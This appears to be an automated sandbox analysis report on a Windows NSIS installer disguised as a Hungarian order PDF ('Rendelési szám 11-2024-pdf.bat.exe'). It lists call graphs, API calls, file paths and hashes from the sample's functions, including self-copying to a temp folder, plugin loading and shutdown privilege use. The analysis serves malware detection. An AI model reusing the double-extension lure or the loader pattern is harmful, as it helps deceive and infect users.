5900->5902 5901->5902 5903 404331 lstrcpynW lstrlenW 4723 402032 4724 402044 4723->4724 4725 4020f6 4723->4725 4726 402c41 17 API calls 4724->4726 4727 401423 24 API calls 4725->4727 4728 40204b 4726->4728 4734 402250 4727->4734 4729 402c41 17 API calls 4728->4729 4730 402054 4729->4730 4731 40206a LoadLibraryExW 4730->4731 4732 40205c GetModuleHandleW 4730->4732 4731->4725 4733 40207b 4731->4733 4732->4731 4732->4733 4746 4066cd WideCharToMultiByte 4733->4746 4737 4020c5 4739 4052ec 24 API calls 4737->4739 4738 40208c 4740 402094 4738->4740 4741 4020ab 4738->4741 4742 40209c 4739->4742 4743 401423 24 API calls 4740->4743 4749 6fbc177b 4741->4749 4742->4734 4744 4020e8 FreeLibrary 4742->4744 4743->4742 4744->4734 4747 4066f7 GetProcAddress 4746->4747 4748 402086 4746->4748 4747->4748 4748->4737 4748->4738 4750 6fbc17ae 4749->4750 4791 6fbc1b63 4750->4791 4752 6fbc17b5 4753 6fbc18da 4752->4753 4754 6fbc17cd 4752->4754 4755 6fbc17c6 4752->4755 4753->4742 4823 6fbc2398 4754->4823 4839 6fbc2356 4755->4839 4760 6fbc17fc 4775 6fbc17f2 4760->4775 4849 6fbc2d2f 4760->4849 4761 6fbc17e3 4765 6fbc17e9 4761->4765 4769 6fbc17f4 4761->4769 4762 6fbc1831 4766 6fbc1837 4762->4766 4767 6fbc1882 4762->4767 4763 6fbc1813 4852 6fbc256d 4763->4852 4765->4775 4833 6fbc2a74 4765->4833 4871 6fbc15c6 4766->4871 4773 6fbc256d 10 API calls 4767->4773 4768 6fbc1819 4863 6fbc15b4 4768->4863 4843 6fbc2728 4769->4843 4778 6fbc1873 4773->4778 4775->4762 4775->4763 4782 6fbc18c9 4778->4782 4878 6fbc2530 4778->4878 4780 6fbc17fa 4780->4775 4781 6fbc256d 10 API calls 4781->4778 4782->4753 4786 6fbc18d3 GlobalFree 4782->4786 4786->4753 4788 6fbc18b5 4788->4782 4882 6fbc153d wsprintfW 4788->4882 4789 6fbc18ae FreeLibrary 4789->4788 4885 6fbc121b GlobalAlloc 4791->4885 4793 6fbc1b87 4886 6fbc121b GlobalAlloc 4793->4886 4795 6fbc1dad GlobalFree GlobalFree GlobalFree 4796 6fbc1dca 4795->4796 4813 6fbc1e14 4795->4813 4797 6fbc2196 4796->4797 4804 6fbc1ddf 4796->4804 4796->4813 4799 6fbc21b8 GetModuleHandleW 4797->4799 4797->4813 4798 6fbc1c68 GlobalAlloc 4812 6fbc1b92 4798->4812 4801 6fbc21de 4799->4801 4802 6fbc21c9 LoadLibraryW 4799->4802 4800 6fbc1cd1 GlobalFree 4800->4812 4893 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4801->4893 4802->4801 4802->4813 4803 6fbc1cb3 lstrcpyW 4806 6fbc1cbd lstrcpyW 4803->4806 4804->4813 4889 6fbc122c 4804->4889 4806->4812 4807 6fbc2230 4809 6fbc223d lstrlenW 4807->4809 4807->4813 4894 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4809->4894 4810 6fbc2068 4892 6fbc121b GlobalAlloc 4810->4892 4812->4795 4812->4798 4812->4800 4812->4803 4812->4806 4812->4810 4812->4813 4816 6fbc20f0 4812->4816 4818 6fbc1fa9 GlobalFree 4812->4818 4819 6fbc122c 2 API calls 4812->4819 4887 6fbc158f GlobalSize GlobalAlloc 4812->4887 4813->4752 4814 6fbc21f0 4814->4807 4821 6fbc221a GetProcAddress 4814->4821 4816->4813 4817 6fbc2138 lstrcpyW 4816->4817 4817->4813 4818->4812 4819->4812 4821->4807 4822 6fbc2071 4822->4752 4824 6fbc23b0 4823->4824 4826 6fbc24d9 GlobalFree 4824->4826 4828 6fbc2458 GlobalAlloc WideCharToMultiByte 4824->4828 4829 6fbc2483 GlobalAlloc 4824->4829 4830 6fbc122c GlobalAlloc lstrcpynW 4824->4830 4831 6fbc249a 4824->4831 4896 6fbc12ba 4824->4896 4826->4824 4827 6fbc17d3 4826->4827 4827->4760 4827->4761 4827->4775 4828->4826 4829->4831 4830->4824 4831->4826 4900 6fbc26bc 4831->4900 4835 6fbc2a86 4833->4835 4834 6fbc2b2b CreateFileA 4836 6fbc2b49 4834->4836 4835->4834 4837 6fbc2c3a GetLastError 4836->4837 4838 6fbc2c45 4836->4838 4837->4838 4838->4775 4840 6fbc236b 4839->4840 4841 6fbc17cc 4840->4841 4842 6fbc2376 GlobalAlloc 4840->4842 4841->4754 4842->4840 4847 6fbc2758 4843->4847 4844 6fbc2806 4846 6fbc280c GlobalSize 4844->4846 4848 6fbc2816 4844->4848 4845 6fbc27f3 GlobalAlloc 4845->4848 4846->4848 4847->4844 4847->4845 4848->4780 4850 6fbc2d3a 4849->4850 4851 6fbc2d7a GlobalFree 4850->4851 4903 6fbc121b GlobalAlloc 4852->4903 4854 6fbc2577 4855 6fbc25f0 MultiByteToWideChar 4854->4855 4856 6fbc2612 StringFromGUID2 4854->4856 4857 6fbc2623 lstrcpynW 4854->4857 4858 6fbc2636 wsprintfW 4854->4858 4859 6fbc265a GlobalFree 4854->4859 4860 6fbc268f GlobalFree 4854->4860 4861 6fbc1272 2 API calls 4854->4861 4904 6fbc12e1 4854->4904 4855->4854 4856->4854 4857->4854 4858->4854 4859->4854 4860->4768 4861->4854 4908 6fbc121b GlobalAlloc 4863->4908 4865 6fbc15b9 4866 6fbc15c6 2 API calls 4865->4866 4867 6fbc15c3 4866->4867 4868 6fbc1272 4867->4868 4869 6fbc127b GlobalAlloc lstrcpynW 4868->4869 4870 6fbc12b5 GlobalFree 4868->4870 4869->4870 4870->4778 4872 6fbc15e4 4871->4872 4873 6fbc15d6 lstrcpyW 4871->4873 4872->4873 4876 6fbc15f0 4872->4876 4875 6fbc161d 4873->4875 4875->4781 4876->4875 4877 6fbc160d wsprintfW 4876->4877 4877->4875 4879 6fbc1895 4878->4879 4880 6fbc253e 4878->4880 4879->4788 4879->4789 4880->4879 4881 6fbc255a GlobalFree 4880->4881 4881->4880 4883 6fbc1272 2 API calls 4882->4883 4884 6fbc155e 4883->4884 4884->4782 4885->4793 4886->4812 4888 6fbc15ad 4887->4888 4888->4812 4895 6fbc121b GlobalAlloc 4889->4895 4891 6fbc123b lstrcpynW 4891->4813 4892->4822 4893->4814 4894->4813 4895->4891 4897 6fbc12c1 4896->4897 4898 6fbc122c 2 API calls 4897->4898 4899 6fbc12df 4898->4899 4899->4824 4901 6fbc26ca VirtualAlloc 4900->4901 4902 6fbc2720 4900->4902 4901->4902 4902->4831 4903->4854 4905 6fbc130c 4904->4905 4906 6fbc12ea 4904->4906 4905->4854 4906->4905 4907 6fbc12f0 lstrcpyW 4906->4907 4907->4905 4908->4865 5904 403932 5905 40393d 5904->5905 5906 403941 5905->5906 5907 403944 GlobalAlloc 5905->5907 5907->5906 5913 6fbc2c4f 5914 6fbc2c67 5913->5914 5915 6fbc158f 2 API calls 5914->5915 5916 6fbc2c82 5915->5916 5917 402a35 5918 402c1f 17 API calls 5917->5918 5919 402a3b 5918->5919 5920 402a72 5919->5920 5922 40288b 5919->5922 5923 402a4d 5919->5923 5921 4062a6 17 API calls 5920->5921 5920->5922 5921->5922 5923->5922 5925 4061cb wsprintfW 5923->5925 5925->5922 5926 401735 5927 402c41 17 API calls 5926->5927 5928 40173c SearchPathW 5927->5928 5929 4029e6 5928->5929 5930 401757 5928->5930 5930->5929 5932 406284 lstrcpynW 5930->5932 5932->5929 5933 4014b8 5934 4014be 5933->5934 5935 401389 2 API calls 5934->5935 5936 4014c6 5935->5936 5937 401db9 GetDC 5938 402c1f 17 API calls 5937->5938 5939 401dcb GetDeviceCaps MulDiv ReleaseDC 5938->5939 5940 402c1f 17 API calls 5939->5940 5941 401dfc 5940->5941 5942 4062a6 17 API calls 5941->5942 5943 401e39 CreateFontIndirectW 5942->5943 5944 402592 5943->5944 5945 4043ba 5946 4043d2 5945->5946 5950 4044ec 5945->5950 5951 4041fb 18 API calls 5946->5951 5947 404556 5948 404620 5947->5948 5949 404560 GetDlgItem 5947->5949 5956 404262 8 API calls 5948->5956 5952 4045e1 5949->5952 5953 40457a 5949->5953 5950->5947 5950->5948 5954 404527 GetDlgItem SendMessageW 5950->5954 5955 404439 5951->5955 5952->5948 5959 4045f3 5952->5959 5953->5952 5958 4045a0 SendMessageW LoadCursorW SetCursor 5953->5958 5978 40421d KiUserCallbackDispatcher 5954->5978 5961 4041fb 18 API calls 5955->5961 5957 40461b 5956->5957 5979 404669 5958->5979 5963 404609 5959->5963 5964 4045f9 SendMessageW 5959->5964 5966 404446 CheckDlgButton 5961->5966 5963->5957 5968 40460f SendMessageW 5963->5968 5964->5963 5965 404551 5969 404645 SendMessageW 5965->5969 5976 40421d KiUserCallbackDispatcher 5966->5976 5968->5957 5969->5947 5971 404464 GetDlgItem 5977 404230 SendMessageW 5971->5977 5973 40447a SendMessageW 5974 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5973->5974 5975 404497 GetSysColor 5973->5975 5974->5957 5975->5974 5976->5971 5977->5973 5978->5965 5982 4058b0 ShellExecuteExW 5979->5982 5981 4045cf LoadCursorW SetCursor 5981->5952 5982->5981 5983 40283b 5984 402843 5983->5984 5985 402847 FindNextFileW 5984->5985 5986 402859 5984->5986 5985->5986 5987 4029e6 5986->5987 5989 406284 lstrcpynW 5986->5989 5989->5987

                                              Executed Functions

                                              Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 31 403482-403487 28->31 32 403489-40348d 28->32 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 31->31 31->32 33 403494-403498 32->33 34 40348f-403493 32->34 36 403557-403564 call 405b86 33->36 37 40349e-4034a4 33->37 34->33 52 403566-403567 36->52 53 403568-40356e 36->53 41 4034a6-4034ae 37->41 42 4034bf-4034f8 37->42 38->39 58 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->58 54 4036c8-4036d8 call 40389a OleUninitialize 39->54 55 40361d-403623 39->55 47 4034b0-4034b3 41->47 48 4034b5 41->48 49 403515-40354f 42->49 50 4034fa-4034ff 42->50 47->42 47->48 48->42 49->36 57 403551-403555 49->57 50->49 56 403501-403509 50->56 52->53 53->28 59 403574 53->59 75 4037fe-403804 54->75 76 4036de-4036ee call 4058ea ExitProcess 54->76 60 4036b8-4036bf call 403974 55->60 61 403629-403634 call 405b86 55->61 63 403510 56->63 64 40350b-40350e 56->64 57->36 65 403576-403584 call 406284 57->65 58->39 58->54 67 403589 59->67 74 4036c4 60->74 79 403682-40368c 61->79 80 403636-40366b 61->80 63->49 64->49 64->63 65->67 67->29 74->54 77 403882-40388a 75->77 78 403806-40381c GetCurrentProcess OpenProcessToken 75->78 85 403890-403894 ExitProcess 77->85 86 40388c 77->86 82 403852-403860 call 40665e 78->82 83 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 78->83 87 4036f4-403708 call 405855 lstrcatW 79->87 88 40368e-40369c call 405c61 79->88 84 40366d-403671 80->84 102 403862-40386c 82->102 103 40386e-403879 ExitWindowsEx 82->103 83->82 91 403673-403678 84->91 92 40367a-40367e 84->92 86->85 100 403715-40372f lstrcatW lstrcmpiW 87->100 101 40370a-403710 lstrcatW 87->101 88->54 99 40369e-4036b4 call 406284 * 2 88->99 91->92 97 403680 91->97 92->84 92->97 97->79 99->60 100->54 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->77 103->106 108 403736-40373b call 4057bb 105->108 109 40373d call 405838 105->109 106->77 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->54 138->126
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 0040337C
                                              • GetVersion.KERNEL32 ref: 00403382
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                              • OleInitialize.OLE32(00000000), ref: 004033F9
                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000020,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                              • ExitProcess.KERNEL32 ref: 004036EE
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                              • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                              • ExitProcess.KERNEL32 ref: 00403894
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations$C:\Users\user\Desktop$C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-3540403757
                                              • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                              • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                              • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                              • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                              Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 148 405691-405695 146->148 149 40563d-405643 146->149 151 405656-40565f call 404262 147->151 152 40561d-40562c ShowWindow * 2 call 404230 147->152 148->151 157 405697-40569d 148->157 153 405645-405651 call 4041d4 149->153 154 40566b-40567b ShowWindow 149->154 160 405664-405668 151->160 152->146 153->151 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->151 165 40569f-4056b2 SendMessageW 157->165 161->148 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405489
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                              • GetClientRect.USER32(?,?), ref: 004054D5
                                              • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                              • ShowWindow.USER32(?,00000008), ref: 00405578
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                              • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                              • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                              • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                              • ShowWindow.USER32(00000000), ref: 00405624
                                              • ShowWindow.USER32(?,00000008), ref: 00405629
                                              • ShowWindow.USER32(00000008), ref: 00405673
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                              • CreatePopupMenu.USER32 ref: 004056B8
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                              • GetWindowRect.USER32(?,?), ref: 004056EC
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                              • OpenClipboard.USER32(00000000), ref: 0040574D
                                              • EmptyClipboard.USER32 ref: 00405753
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                              • GlobalLock.KERNEL32(00000000), ref: 00405769
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                              • CloseClipboard.USER32 ref: 004057AE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {$6B
                                              • API String ID: 590372296-3705917127
                                              • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                              • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                              • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                              • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                              Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 499 405996-4059bc call 405c61 502 4059d5-4059dc 499->502 503 4059be-4059d0 DeleteFileW 499->503 504 4059de-4059e0 502->504 505 4059ef-4059ff call 406284 502->505 506 405b52-405b56 503->506 507 405b00-405b05 504->507 508 4059e6-4059e9 504->508 512 405a01-405a0c lstrcatW 505->512 513 405a0e-405a0f call 405ba5 505->513 507->506 511 405b07-405b0a 507->511 508->505 508->507 514 405b14-405b1c call 4065c7 511->514 515 405b0c-405b12 511->515 516 405a14-405a18 512->516 513->516 514->506 523 405b1e-405b32 call 405b59 call 40594e 514->523 515->506 519 405a24-405a2a lstrcatW 516->519 520 405a1a-405a22 516->520 522 405a2f-405a4b lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a51-405a59 522->524 525 405af5-405af9 522->525 539 405b34-405b37 523->539 540 405b4a-405b4d call 4052ec 523->540 528 405a79-405a8d call 406284 524->528 529 405a5b-405a63 524->529 525->507 527 405afb 525->527 527->507 541 405aa4-405aaf call 40594e 528->541 542 405a8f-405a97 528->542 533 405a65-405a6d 529->533 534 405ad8-405ae8 FindNextFileW 529->534 533->528 538 405a6f-405a77 533->538 534->524 537 405aee-405aef FindClose 534->537 537->525 538->528 538->534 539->515 543 405b39-405b48 call 4052ec call 40604a 539->543 540->506 552 405ad0-405ad3 call 4052ec 541->552 553 405ab1-405ab4 541->553 542->534 544 405a99-405aa2 call 405996 542->544 543->506 544->534 552->534 556 405ab6-405ac6 call 4052ec call 40604a 553->556 557 405ac8-405ace 553->557 556->534 557->534
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059BF
                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A07
                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A30
                                              • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A40
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                              • FindClose.KERNEL32(00000000), ref: 00405AEF
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                              • \*.*, xrefs: 00405A01
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00405996
                                              Memory Dump Source
